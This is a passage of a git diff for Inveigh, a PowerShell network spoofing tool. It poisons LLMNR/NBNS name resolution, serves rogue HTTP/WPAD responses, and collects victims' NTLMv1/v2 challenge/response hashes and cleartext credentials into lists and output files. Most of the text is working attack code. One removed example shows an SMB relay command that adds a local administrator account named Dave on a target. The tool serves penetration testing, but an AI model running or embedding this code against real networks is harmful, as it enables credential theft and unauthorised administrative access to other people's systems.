while($inveigh.NTLMv2_file_queue.Count -gt 0) + { + $inveigh.NTLMv2_file_queue[0]|Out-File $inveigh.NTLMv2_out_file -Append + $inveigh.NTLMv2_file_queue.RemoveAt(0) + } + + while($inveigh.cleartext_file_queue.Count -gt 0) + { + $inveigh.cleartext_file_queue[0]|Out-File $inveigh.cleartext_out_file -Append + $inveigh.cleartext_file_queue.RemoveAt(0) + } + +} + +} +#End Invoke-InveighBruteForce + +function Stop-Inveigh +{ +<# +.SYNOPSIS +Stop-Inveigh will stop all running Inveigh functions. +#> + +if($inveigh) +{ + + if($inveigh.running -or $inveigh.relay_running -or $inveigh.unprivileged_running) + { + + if($inveigh.HTTP_listener.IsListening) + { + $inveigh.HTTP_listener.Stop() + $inveigh.HTTP_listener.Close() + } + + if($inveigh.unprivileged_running) + { + $inveigh.unprivileged_running = $false + Start-Sleep -s 5 + Write-Output("Inveigh Unprivileged exited at $(Get-Date -format 's')") + $inveigh.log.Add("$(Get-Date -format 's') - Inveigh Unprivileged exited") > $null + + if($inveigh.file_output) + { + "$(Get-Date -format 's') - Inveigh Unprivileged exited" | Out-File $Inveigh.log_out_file -Append + } + + } + + if($inveigh.relay_running) + { + $inveigh.relay_running = $false + Write-Output("Inveigh Relay exited at $(Get-Date -format 's')") + $inveigh.log.Add("$(Get-Date -format 's') - Inveigh Relay exited") > $null + + if($inveigh.file_output) + { + "$(Get-Date -format 's') - Inveigh Relay exited" | Out-File $Inveigh.log_out_file -Append + } + + } + + if($inveigh.running) + { + $inveigh.running = $false + Write-Output("Inveigh exited at $(Get-Date -format 's')") + $inveigh.log.Add("$(Get-Date -format 's') - Inveigh exited") > $null + + if($inveigh.file_output) + { + "$(Get-Date -format 's') - Inveigh exited" | Out-File $Inveigh.log_out_file -Append + } + + } + + } + else + { + Write-Output("There are no running Inveigh functions") + } + + if($inveigh.HTTPS) + { + & "netsh" http delete sslcert ipport=0.0.0.0:443 > $null + + try + { + $certificate_store = New-Object System.Security.Cryptography.X509Certificates.X509Store("My","LocalMachine") + $certificate_store.Open('ReadWrite') + $certificate = $certificate_store.certificates.Find("FindByThumbprint",$inveigh.certificate_thumbprint,$FALSE)[0] + $certificate_store.Remove($certificate) + $certificate_store.Close() + } + catch + { + Write-Output("SSL Certificate Deletion Error - Remove Manually") + $inveigh.log.Add("$(Get-Date -format 's') - SSL Certificate Deletion Error - Remove Manually") > $null + + if($inveigh.file_output) + { + "$(Get-Date -format 's') - SSL Certificate Deletion Error - Remove Manually" | Out-File $Inveigh.log_out_file -Append + } + + } + } + + $inveigh.HTTP = $false + $inveigh.HTTPS = $false +} +else +{ + Write-Output("There are no running Inveigh functions")|Out-Null +} + +} + +function Get-Inveigh +{ +<# +.SYNOPSIS +Get-Inveigh will get stored Inveigh data from memory. + +.PARAMETER Console +Get queued console output. This is also the default if no parameters are set. + +.PARAMETER Log +Get log entries. + +.PARAMETER NTLMv1 +Get captured NTLMv1 challenge/response hashes. + +.PARAMETER NTLMv1Unique +Get the first captured NTLMv1 challenge/response for each unique account. + +.PARAMETER NTLMv1Usernames +Get IP addresses and usernames for captured NTLMv2 challenge/response hashes. + +.PARAMETER NTLMv2 +Get captured NTLMv1 challenge/response hashes. + +.PARAMETER NTLMv2Unique +Get the first captured NTLMv2 challenge/response for each unique account. + +.PARAMETER NTLMv2Usernames +Get IP addresses and usernames for captured NTLMv2 challenge/response hashes. + +.PARAMETER Cleartext +Get captured cleartext credentials. + +.PARAMETER CleartextUnique +Get unique captured cleartext credentials. + +.PARAMETER Learning +Get valid hosts discovered through spoofer learning. +#> + +[CmdletBinding()] +param +( + [parameter(Mandatory=$false)][Switch]$Console, + [parameter(Mandatory=$false)][Switch]$Log, + [parameter(Mandatory=$false)][Switch]$NTLMv1, + [parameter(Mandatory=$false)][Switch]$NTLMv2, + [parameter(Mandatory=$false)][Switch]$NTLMv1Unique, + [parameter(Mandatory=$false)][Switch]$NTLMv2Unique, + [parameter(Mandatory=$false)][Switch]$NTLMv1Usernames, + [parameter(Mandatory=$false)][Switch]$NTLMv2Usernames, + [parameter(Mandatory=$false)][Switch]$Cleartext, + [parameter(Mandatory=$false)][Switch]$CleartextUnique, + [parameter(Mandatory=$false)][Switch]$Learning, + [parameter(ValueFromRemainingArguments=$true)]$invalid_parameter +) + +if($Console -or $PSBoundParameters.Count -eq 0) +{ + + while($inveigh.console_queue.Count -gt 0) + { + + if($inveigh.output_stream_only) + { + Write-Output($inveigh.console_queue[0] + $inveigh.newline) + $inveigh.console_queue.RemoveAt(0) + } + else + { + + switch -wildcard ($inveigh.console_queue[0]) + { + + "* written to *" + { + + if($inveigh.file_output) + { + Write-Warning $inveigh.console_queue[0] + } + + $inveigh.console_queue.RemoveAt(0) + } + + "* for relay *" + { + Write-Warning $inveigh.console_queue[0] + $inveigh.console_queue.RemoveAt(0) + } + + "*SMB relay *" + { + Write-Warning $inveigh.console_queue[0] + $inveigh.console_queue.RemoveAt(0) + } + + "* local administrator *" + { + Write-Warning $inveigh.console_queue[0] + $inveigh.console_queue.RemoveAt(0) + } + + default + { + Write-Output $inveigh.console_queue[0] + $inveigh.console_queue.RemoveAt(0) + } + + } + + } + + } + +} + +if($Log) +{ + Write-Output $inveigh.log +} + +if($NTLMv1) +{ + Write-Output $inveigh.NTLMv1_list +} + +if($NTLMv1Unique) +{ + $inveigh.NTLMv1_list.Sort() + + foreach($unique_NTLMv1 in $inveigh.NTLMv1_list) + { + $unique_NTLMv1_account = $unique_NTLMv1.SubString(0,$unique_NTLMv1.IndexOf(":",($unique_NTLMv1.IndexOf(":") + 2))) + + if($unique_NTLMv1_account -ne $unique_NTLMv1_account_last) + { + Write-Output $unique_NTLMv1 + } + + $unique_NTLMv1_account_last = $unique_NTLMv1_account + } + +} + +if($NTLMv1Usernames) +{ + Write-Output $inveigh.NTLMv2_username_list +} + +if($NTLMv2) +{ + Write-Output $inveigh.NTLMv2_list +} + +if($NTLMv2Unique) +{ + $inveigh.NTLMv2_list.Sort() + + foreach($unique_NTLMv2 in $inveigh.NTLMv2_list) + { + $unique_NTLMv2_account = $unique_NTLMv2.SubString(0,$unique_NTLMv2.IndexOf(":",($unique_NTLMv2.IndexOf(":") + 2))) + + if($unique_NTLMv2_account -ne $unique_NTLMv2_account_last) + { + Write-Output $unique_NTLMv2 + } + + $unique_NTLMv2_account_last = $unique_NTLMv2_account + } + +} + +if($NTLMv2Usernames) +{ + Write-Output $inveigh.NTLMv2_username_list +} + +if($Cleartext) +{ + Write-Output $inveigh.cleartext_list +} + +if($CleartextUnique) +{ + Write-Output $inveigh.cleartext_list | Get-Unique +} + +if($Learning) +{ + Write-Output $inveigh.valid_host_list +} + +} + +function Watch-Inveigh +{ +<# +.SYNOPSIS +Watch-Inveigh will enabled real time console output. If using this function through a shell, test to ensure that it doesn't hang the shell. +#> + +if($inveigh.tool -ne 1) +{ + + if($inveigh.running -or $inveigh.relay_running -or $inveigh.unprivileged_running) + { + Write-Output "Press any key to stop real time console output" + $inveigh.console_output = $true + + :console_loop while((($inveigh.running -or $inveigh.relay_running -or $inveigh.unprivileged_running) -and $inveigh.console_output) -or ($inveigh.console_queue.Count -gt 0 -and $inveigh.console_output)) + { + + while($inveigh.console_queue.Count -gt 0) + { + + if($inveigh.output_stream_only) + { + Write-Output($inveigh.console_queue[0] + $inveigh.newline) + $inveigh.console_queue.RemoveAt(0) + } + else + { + + switch -wildcard ($inveigh.console_queue[0]) + { + + "* written to *" + { + + if($inveigh.file_output) + { + Write-Warning $inveigh.console_queue[0] + } + + $inveigh.console_queue.RemoveAt(0) + } + + "* for relay *" + { + Write-Warning $inveigh.console_queue[0] + $inveigh.console_queue.RemoveAt(0) + } + + "*SMB relay *" + { + Write-Warning $inveigh.console_queue[0] + $inveigh.console_queue.RemoveAt(0) + } + + "* local administrator *" + { + Write-Warning $inveigh.console_queue[0] + $inveigh.console_queue.RemoveAt(0) + } + + default + { + Write-Output $inveigh.console_queue[0] + $inveigh.console_queue.RemoveAt(0) + } + + } + + } + + } + + if([Console]::KeyAvailable) + { + $inveigh.console_output = $false + BREAK console_loop + } + + Start-Sleep -m 5 + } + + } + else + { + Write-Output "Inveigh isn't running" + } + +} +else +{ + Write-Output "Watch-Inveigh cannot be used with current external tool selection" +} + +} + +function Clear-Inveigh +{ +<# +.SYNOPSIS +Clear-Inveigh will clear Inveigh data from memory. +#> + +if($inveigh) +{ + + if(!$inveigh.running -and !$inveigh.relay_running -and !$inveigh.unprivileged_running) + { + Remove-Variable inveigh -scope global + Write-Output "Inveigh data has been cleared from memory" + } + else + { + Write-Output "Run Stop-Inveigh before running Clear-Inveigh" + } + +} + +} \ No newline at end of file diff --git a/Scripts/Inveigh.ps1 b/Scripts/Inveigh.ps1 index 1e5ea3f..8c7437f 100644 --- a/Scripts/Inveigh.ps1 +++ b/Scripts/Inveigh.ps1 @@ -16,12 +16,12 @@ Invoke-Inveigh is a Windows PowerShell LLMNR/NBNS spoofer with the following fea Run time control .PARAMETER IP -Specify a specific local IP address for listening. This IP address will also be used for LLMNR/NBNS spoofing if -the SpooferIP parameter is not set. +Specific local IP address for listening. This IP address will also be used for LLMNR/NBNS spoofing if the +SpooferIP parameter is not set. .PARAMETER SpooferIP -Specify an IP address for LLMNR/NBNS spoofing. This parameter is only necessary when redirecting victims to a -system other than the Inveigh host. +IP address for LLMNR/NBNS spoofing. This parameter is only necessary when redirecting victims to a system other +than the Inveigh host. .PARAMETER SpooferHostsReply Default = All: Comma separated list of requested hostnames to respond to when spoofing with LLMNR and NBNS. @@ -35,6 +35,19 @@ Default = All: Comma separated list of source IP addresses to respond to when sp .PARAMETER SpooferIPsIgnore Default = All: Comma separated list of source IP addresses to ignore when spoofing with LLMNR and NBNS. +.PARAMETER SpooferLearning +Default = Disabled: (Y/N) Enable/Disable LLMNR/NBNS valid host learning. If enabled, Inveigh will send out +LLMNR/NBNS requests for any received LLMNR/NBNS requests. If a response is received, Inveigh will add the +hostname to a spoofing blacklist. + +.PARAMETER SpooferLearningDelay +(Interger) Time in minutes that Inveigh will delay spoofing while valid hosts are being blacklisted through +SpooferLearning. + +.PARAMETER SpooferLearningInterval +Default = 30 Minutes: (Interger) Time in minutes that Inveigh wait before sending out an LLMNR/NBNS request for a +hostname that has already been checked if SpooferLearning is enabled. + .PARAMETER SpooferRepeat Default = Enabled: (Y/N) Enable/Disable repeated LLMNR/NBNS spoofs to a victim system after one user challenge/response has been captured. @@ -43,13 +56,13 @@ challenge/response has been captured. Default = Enabled: (Y/N) Enable/Disable LLMNR spoofing. .PARAMETER LLMNRTTL -Default = 30 Seconds: Specify a custom LLMNR TTL in seconds for the response packet. +Default = 30 Seconds: LLMNR TTL in seconds for the response packet. .PARAMETER NBNS Default = Disabled: (Y/N) Enable/Disable NBNS spoofing. .PARAMETER NBNSTTL -Default = 165 Seconds: Specify a custom NBNS TTL in seconds for the response packet. +Default = 165 Seconds: NBNS TTL in seconds for the response packet. .PARAMETER NBNSTypes Default = 00,20: Comma separated list of NBNS types to spoof. @@ -65,36 +78,38 @@ the local store and attached to port 443. If the script does not exit gracefully in the cert store. .PARAMETER HTTPAuth -Default = NTLM: (Anonymous,Basic,NTLM) Specify the HTTP/HTTPS server authentication type. This setting does not -apply to wpad.dat requests. +Default = NTLM: (Anonymous,Basic,NTLM) HTTP/HTTPS server authentication type. This setting does not apply to +wpad.dat requests. Note that Microsoft has changed the behavior of WDAP through NBNS in the June 2016 patches. A +WPAD enabled browser may now trigger NTLM authentication after sending out NBNS requests to random hostnames and +connecting to the root of the web server. .PARAMETER HTTPBasicRealm -Specify a realm name for Basic authentication. This parameter applies to both HTTPAuth and WPADAuth. +Realm name for Basic authentication. This parameter applies to both HTTPAuth and WPADAuth. .PARAMETER HTTPDir -Specify a full directory path to enable hosting of basic content through the HTTP/HTTPS listener. +Full directory path to enable hosting of basic content through the HTTP/HTTPS listener. .PARAMETER HTTPDefaultFile -Specify a filename within the HTTPDir to serve as the default HTTP/HTTPS response file. This file will not be used -for wpad.dat requests. +Filename within the HTTPDir to serve as the default HTTP/HTTPS response file. This file will not be used for +wpad.dat requests. .PARAMETER HTTPDefaultEXE -Specify an EXE filename within the HTTPDir to serve as the default HTTP/HTTPS response for EXE requests. +EXE filename within the HTTPDir to serve as the default HTTP/HTTPS response for EXE requests. .PARAMETER HTTPResponse -Specify a string or HTML to serve as the default HTTP/HTTPS response. This response will not be used for wpad.dat -requests. This parameter will not be used if HTTPDir is set. Use PowerShell character escapes where necessary. +String or HTML to serve as the default HTTP/HTTPS response. This response will not be used for wpad.dat requests. +This parameter will not be used if HTTPDir is set. Use PowerShell character escapes where necessary. .PARAMETER HTTPSCertAppID -Specify a valid application GUID for use with the ceriticate. +Valid application GUID for use with the ceriticate. .PARAMETER HTTPSCertThumbprint -Specify a certificate thumbprint for use with a custom certificate. The certificate filename must be located in -the current working directory and named Inveigh.pfx. +Certificate thumbprint for use with a custom certificate. The certificate filename must be located in the current +working directory and named Inveigh.pfx. .PARAMETER WPADAuth -Default = NTLM: (Anonymous,Basic,NTLM) Specify the HTTP/HTTPS server authentication type for wpad.dat requests. -Setting to Anonymous can prevent browser login prompts. +Default = NTLM: (Anonymous,Basic,NTLM) HTTP/HTTPS server authentication type for wpad.dat requests. Setting to +Anonymous can prevent browser login prompts. .PARAMETER WPADEmptyFile Default = Enabled: (Y/N) Enable/Disable serving a proxyless, all direct, wpad.dat file for wpad.dat requests. @@ -102,20 +117,20 @@ Enabling this setting can reduce the amount of redundant wpad.dat requests. This using WPADIP, WPADPort, or WPADResponse. .PARAMETER WPADIP -Specify a proxy server IP to be included in a basic wpad.dat response for WPAD enabled browsers. This parameter -must be used with WPADPort. +Proxy server IP to be included in a basic wpad.dat response for WPAD enabled browsers. This parameter must be used +with WPADPort. .PARAMETER WPADPort -Specify a proxy server port to be included in a basic wpad.dat response for WPAD enabled browsers. This parameter -must be used with WPADIP. +Proxy server port to be included in a basic wpad.dat response for WPAD enabled browsers. This parameter must be +used with WPADIP. .PARAMETER WPADDirectHosts Comma separated list of hosts to list as direct in the wpad.dat file. Listed hosts will not be routed through the defined proxy. .PARAMETER WPADResponse -Specify wpad.dat file contents to serve as the wpad.dat response. This parameter will not be used if WPADIP and -WPADPort are set. Use PowerShell character escapes where necessary. +wpad.dat file contents to serve as the wpad.dat response. This parameter will not be used if WPADIP and WPADPort +are set. Use PowerShell character escapes where necessary. .PARAMETER SMB Default = Enabled: (Y/N) Enable/Disable SMB challenge/response capture. Warning, LLMNR/NBNS spoofing can still @@ -123,38 +138,18 @@ direct targets to the host system's SMB server. Block TCP ports 445/139 or kill prevent login requests from being processed by the Inveigh host. .PARAMETER Challenge -Default = Random: Specify a 16 character hex NTLM challenge for use with the HTTP listener. If left blank, a -random challenge will be generated for each request. This will only be used for non-relay captures. +Default = Random: 16 character hex NTLM challenge for use with the HTTP listener. If left blank, a random +challenge will be generated for each request. .PARAMETER MachineAccounts Default = Disabled: (Y/N) Enable/Disable showing NTLM challenge/response captures from machine accounts. -.PARAMETER SMBRelay -Default = Disabled: (Y/N) Enable/Disable SMB relay. Note that Inveigh-Relay.ps1 must be loaded into memory. - -.PARAMETER SMBRelayTarget -IP address of system to target for SMB relay. - -.PARAMETER SMBRelayCommand -Command to execute on SMB relay target. - -.PARAMETER SMBRelayUsernames -Default = All Usernames: Comma separated list of usernames to use for relay attacks. Accepts both username and -domain\username format. - -.PARAMETER SMBRelayAutoDisable -Default = Enable: (Y/N) Automaticaly disable SMB relay after a successful command execution on target. - -.PARAMETER SMBRelayNetworkTimeout -Default = No Timeout: (Integer) Set the duration in seconds that Inveigh will wait for a reply from the SMB relay - target after each packet is sent. - .PARAMETER ConsoleOutput Default = Disabled: (Y/N) Enable/Disable real time console output. If using this option through a shell, test to ensure that it doesn't hang the shell. .PARAMETER ConsoleStatus -(Integer) Set interval in minutes for displaying all unique captured hashes and credentials. This is useful for +(Integer) Interval in minutes for displaying all unique captured hashes and credentials. This is useful for displaying full capture lists when running through a shell that does not have access to the support functions. .PARAMETER ConsoleUnique @@ -177,11 +172,11 @@ running Inveigh through a shell that does not return other output streams.Note t yellow warning messages if enabled. .PARAMETER OutputDir -Default = Working Directory: Set a valid path to an output directory for log and capture files. FileOutput must +Default = Working Directory: Valid path to an output directory for log and capture files. FileOutput must also be enabled. .PARAMETER RunTime -(Integer) Set the run time duration in minutes. +(Integer) Run time duration in minutes. .PARAMETER ShowHelp Default = Enabled: (Y/N) Enable/Disable the help messages at startup. @@ -190,8 +185,9 @@ Default = Enabled: (Y/N) Enable/Disable the help messages at startup. (Switch) Disable LLMNR, NBNS, HTTP, HTTPS, and SMB in order to only inspect LLMNR/NBNS traffic. .PARAMETER Tool -Default = 0: (0,1,2) Enable/Disable features for better operation through external tools such as Metasploit's -Interactive Powershell Sessions and Empire. 0 = None, 1 = Metasploit, 2 = Empire +Default = 0: (0,1,2) Enable/Disable features for better operation through external tools such as Meterpreter's +PowerShell extension, Metasploit's Interactive PowerShell Sessions payloads and Empire. +0 = None, 1 = Metasploit/Meterpreter, 2 = Empire .EXAMPLE Import-Module .\Inveigh.psd1;Invoke-Inveigh @@ -220,12 +216,7 @@ useful for sending traffic to a controlled Linux system on another subnet. .EXAMPLE Invoke-Inveigh -HTTPResponse "" -Execute specifying an HTTP redirect response. - -.EXAMPLE -Invoke-Inveigh -SMBRelay y -SMBRelayTarget 192.168.2.55 -SMBRelayCommand "net user Dave Summer2016 /add && net localgroup administrators Dave /add" -Execute with SMB relay enabled with a command that will create a local administrator account on the SMB relay -target. +Execute specifying an HTTP redirect response. .NOTES 1. An elevated administrator or SYSTEM shell is needed. @@ -247,54 +238,51 @@ https://github.com/Kevin-Robertson/Inveigh [CmdletBinding()] param ( - [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$HTTP="Y", - [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$HTTPS="N", - [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$SMB="Y", - [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$LLMNR="Y", - [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$NBNS="N", - [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$SpooferRepeat="Y", - [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$ConsoleOutput="N", - [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$ConsoleUnique="Y", - [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$FileOutput="N", - [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$FileUnique="Y", - [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$StatusOutput="Y", - [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$OutputStreamOnly="N", - [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$MachineAccounts="N", - [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$ShowHelp="Y", - [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$SMBRelay="N", - [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$SMBRelayAutoDisable="Y", - [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$WPADEmptyFile="Y", - [parameter(Mandatory=$false)][ValidateSet("0","1","2")][String]$Tool="0", - [parameter(Mandatory=$false)][ValidateSet("Anonymous","Basic","NTLM")][String]$HTTPAuth="NTLM", - [parameter(Mandatory=$false)][ValidateSet("Anonymous","Basic","NTLM")][String]$WPADAuth="NTLM", - [parameter(Mandatory=$false)][ValidateSet("00","03","20","1B","1C","1D","1E")][Array]$NBNSTypes=@("00","20"), - [parameter(Mandatory=$false)][ValidateScript({$_ -match [System.Net.IPAddress]$_})][String]$IP="", - [parameter(Mandatory=$false)][ValidateScript({$_ -match [System.Net.IPAddress]$_})][String]$SpooferIP="", + [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$HTTP = "Y", + [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$HTTPS = "N", + [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$SMB = "Y", + [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$LLMNR = "Y", + [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$NBNS = "N", + [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$SpooferLearning = "N", + [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$SpooferRepeat = "Y", + [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$ConsoleOutput = "N", + [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$ConsoleUnique = "Y", + [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$FileOutput = "N", + [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$FileUnique = "Y", + [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$StatusOutput = "Y", + [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$OutputStreamOnly = "N", + [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$MachineAccounts = "N", + [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$ShowHelp = "Y", + [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$WPADEmptyFile = "Y", + [parameter(Mandatory=$false)][ValidateSet("0","1","2")][String]$Tool = "0", + [parameter(Mandatory=$false)][ValidateSet("Anonymous","Basic","NTLM")][String]$HTTPAuth = "NTLM", + [parameter(Mandatory=$false)][ValidateSet("Anonymous","Basic","NTLM")][String]$WPADAuth = "NTLM", + [parameter(Mandatory=$false)][ValidateSet("00","03","20","1B","1C","1D","1E")][Array]$NBNSTypes = @("00","20"), + [parameter(Mandatory=$false)][ValidateScript({$_ -match [System.Net.IPAddress]$_})][String]$IP = "", + [parameter(Mandatory=$false)][ValidateScript({$_ -match [System.Net.IPAddress]$_})][String]$SpooferIP = "", [parameter(Mandatory=$false)][ValidateScript({$_ -match [System.Net.IPAddress]$_})][String]$WPADIP = "", - [parameter(Mandatory=$false)][ValidateScript({$_ -match [System.Net.IPAddress]$_})][String]$SMBRelayTarget ="", - [parameter(Mandatory=$false)][ValidateScript({Test-Path $_})][String]$HTTPDir="", - [parameter(Mandatory=$false)][ValidateScript({Test-Path $_})][String]$OutputDir="", - [parameter(Mandatory=$false)][ValidatePattern('^[A-Fa-f0-9]{16}$')][String]$Challenge="", - [parameter(Mandatory=$false)][Array]$SpooferHostsReply="", - [parameter(Mandatory=$false)][Array]$SpooferHostsIgnore="", - [parameter(Mandatory=$false)][Array]$SpooferIPsReply="", - [parameter(Mandatory=$false)][Array]$SpooferIPsIgnore="", - [parameter(Mandatory=$false)][Array]$SMBRelayUsernames="", - [parameter(Mandatory=$false)][Array]$WPADDirectHosts="", - [parameter(Mandatory=$false)][Int]$ConsoleStatus="", - [parameter(Mandatory=$false)][Int]$LLMNRTTL="30", - [parameter(Mandatory=$false)][Int]$NBNSTTL="165", - [parameter(Mandatory=$false)][Int]$WPADPort="", - [parameter(Mandatory=$false)][Int]$RunTime="", - [parameter(Mandatory=$false)][Int]$SMBRelayNetworkTimeout="", - [parameter(Mandatory=$false)][String]$HTTPBasicRealm="IIS", - [parameter(Mandatory=$false)][String]$HTTPDefaultFile="", - [parameter(Mandatory=$false)][String]$HTTPDefaultEXE="", - [parameter(Mandatory=$false)][String]$HTTPResponse="", - [parameter(Mandatory=$false)][String]$HTTPSCertAppID="00112233-4455-6677-8899-AABBCCDDEEFF", - [parameter(Mandatory=$false)][String]$HTTPSCertThumbprint="98c1d54840c5c12ced710758b6ee56cc62fa1f0d", - [parameter(Mandatory=$false)][String]$WPADResponse="", - [parameter(Mandatory=$false)][String]$SMBRelayCommand="", + [parameter(Mandatory=$false)][ValidateScript({Test-Path $_})][String]$HTTPDir = "", + [parameter(Mandatory=$false)][ValidateScript({Test-Path $_})][String]$OutputDir = "", + [parameter(Mandatory=$false)][ValidatePattern('^[A-Fa-f0-9]{16}$')][String]$Challenge = "", + [parameter(Mandatory=$false)][Array]$SpooferHostsReply = "", + [parameter(Mandatory=$false)][Array]$SpooferHostsIgnore = "", + [parameter(Mandatory=$false)][Array]$SpooferIPsReply = "", + [parameter(Mandatory=$false)][Array]$SpooferIPsIgnore = "", + [parameter(Mandatory=$false)][Array]$WPADDirectHosts = "", + [parameter(Mandatory=$false)][Int]$ConsoleStatus = "", + [parameter(Mandatory=$false)][Int]$LLMNRTTL = "30", + [parameter(Mandatory=$false)][Int]$NBNSTTL = "165", + [parameter(Mandatory=$false)][Int]$WPADPort = "", + [parameter(Mandatory=$false)][Int]$RunTime = "", + [parameter(Mandatory=$false)][Int]$SpooferLearningDelay = "", + [parameter(Mandatory=$false)][Int]$SpooferLearningInterval = "30", + [parameter(Mandatory=$false)][String]$HTTPBasicRealm = "IIS", + [parameter(Mandatory=$false)][String]$HTTPDefaultFile = "", + [parameter(Mandatory=$false)][String]$HTTPDefaultEXE = "", + [parameter(Mandatory=$false)][String]$HTTPResponse = "", + [parameter(Mandatory=$false)][String]$HTTPSCertAppID = "00112233-4455-6677-8899-AABBCCDDEEFF", + [parameter(Mandatory=$false)][String]$HTTPSCertThumbprint = "98c1d54840c5c12ced710758b6ee56cc62fa1f0d", + [parameter(Mandatory=$false)][String]$WPADResponse = "", [parameter(Mandatory=$false)][Switch]$Inspect, [parameter(ValueFromRemainingArguments=$true)]$invalid_parameter ) @@ -314,30 +302,6 @@ if(!$SpooferIP) $SpooferIP = $IP } -if($SMBRelay -eq 'Y') -{ - - if(!$SMBRelayTarget) - { - throw "You must specify an -SMBRelayTarget if enabling -SMBRelay" - } - - if(!$SMBRelayCommand) - { - throw "You must specify an -SMBRelayCommand if enabling -SMBRelay" - } - - if($Challenge -or $HTTPDefaultFile -or $HTTPDefaultEXE -or $HTTPResponse -or $WPADIP -or $WPADPort -or $WPADResponse) - { - throw "-Challenge -HTTPDefaultFile, -HTTPDefaultEXE, -HTTPResponse, -WPADIP, -WPADPort, and -WPADResponse can not be used when enabling -SMBRelay" - } - elseif($HTTPAuth -ne 'NTLM' -or $WPADAuth -eq 'Basic') - { - throw "Only -HTTPAuth NTLM, -WPADAuth NTLM, and -WPADAuth Anonymous can be used when enabling -SMBRelay" - } - -} - if($HTTPDefaultFile -or $HTTPDefaultEXE) { @@ -383,47 +347,42 @@ if(!$inveigh) $inveigh.cleartext_list = New-Object System.Collections.ArrayList $inveigh.IP_capture_list = New-Object System.Collections.ArrayList $inveigh.SMBRelay_failed_list = New-Object System.Collections.ArrayList + $inveigh.valid_host_list = New-Object System.Collections.ArrayList } if($inveigh.running) { throw "Invoke-Inveigh is already running, use Stop-Inveigh" } -elseif($inveigh.relay_running) -{ - throw "Invoke-InveighRelay is already running, use Stop-Inveigh" -} $inveigh.sniffer_socket = $null -if($inveigh.HTTP_listener.IsListening) +if($inveigh.HTTP_listener.IsListening -and !$inveigh.relay_running) { $inveigh.HTTP_listener.Stop() $inveigh.HTTP_listener.Close() } -$inveigh.console_queue = New-Object System.Collections.ArrayList -$inveigh.status_queue = New-Object System.Collections.ArrayList -$inveigh.log_file_queue = New-Object System.Collections.ArrayList -$inveigh.NTLMv1_file_queue = New-Object System.Collections.ArrayList -$inveigh.NTLMv2_file_queue = New-Object System.Collections.ArrayList -$inveigh.cleartext_file_queue = New-Object System.Collections.ArrayList -$inveigh.certificate_application_ID = $HTTPSCertAppID -$inveigh.certificate_thumbprint = $HTTPSCertThumbprint -$inveigh.HTTP_challenge_queue = New-Object System.Collections.ArrayList -$inveigh.console_output = $false -$inveigh.console_input = $true -$inveigh.file_output = $false -$inveigh.log_out_file = $output_directory + "\Inveigh-Log.txt" -$inveigh.NTLMv1_out_file = $output_directory + "\Inveigh-NTLMv1.txt" -$inveigh.NTLMv2_out_file = $output_directory + "\Inveigh-NTLMv2.txt" -$inveigh.cleartext_out_file = $output_directory + "\Inveigh-Cleartext.txt" -$inveigh.HTTP_response = $HTTPResponse -$inveigh.HTTP_directory = $HTTPDir -$inveigh.HTTP_default_file = $HTTPDefaultFile -$inveigh.HTTP_default_exe = $HTTPDefaultEXE -$inveigh.WPAD_response = $WPADResponse -$inveigh.challenge = $Challenge +if(!$inveigh.relay_running -or !$inveigh.unprivileged_running) +{ + $inveigh.console_queue = New-Object System.Collections.ArrayList + $inveigh.status_queue = New-Object System.Collections.ArrayList + $inveigh.log_file_queue = New-Object System.Collections.ArrayList + $inveigh.NTLMv1_file_queue = New-Object System.Collections.ArrayList + $inveigh.NTLMv2_file_queue = New-Object System.Collections.ArrayList + $inveigh.cleartext_file_queue = New-Object System.Collections.ArrayList + $inveigh.HTTP_challenge_queue = New-Object System.Collections.ArrayList + $inveigh.certificate_application_ID = $HTTPSCertAppID + $inveigh.certificate_thumbprint = $HTTPSCertThumbprint + $inveigh.console_output = $false + $inveigh.console_input = $true + $inveigh.file_output = $false + $inveigh.log_out_file = $output_directory + "\Inveigh-Log.txt" + $inveigh.NTLMv1_out_file = $output_directory + "\Inveigh-NTLMv1.txt" + $inveigh.NTLMv2_out_file = $output_directory + "\Inveigh-NTLMv2.txt" + $inveigh.cleartext_out_file = $output_directory + "\Inveigh-Cleartext.txt" +} + $inveigh.running = $true if($StatusOutput -eq 'Y') @@ -453,7 +412,7 @@ if($Inspect) $SMB = "N" } -if($Tool -eq 1) # Metasploit Interactive PowerShell +if($Tool -eq 1) # Metasploit Interactive PowerShell Payloads and Meterpreter's PowerShell Extension { $inveigh.tool = 1 $inveigh.output_stream_only = $true @@ -479,7 +438,7 @@ else $inveigh.status_queue.Add("Inveigh started at $(Get-Date -format 's')") > $null $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("$(Get-Date -format 's') - Inveigh started")]) > $null -$firewall_status = netsh advfirewall show allprofiles state | where {$_ -match 'ON'} +$firewall_status = netsh 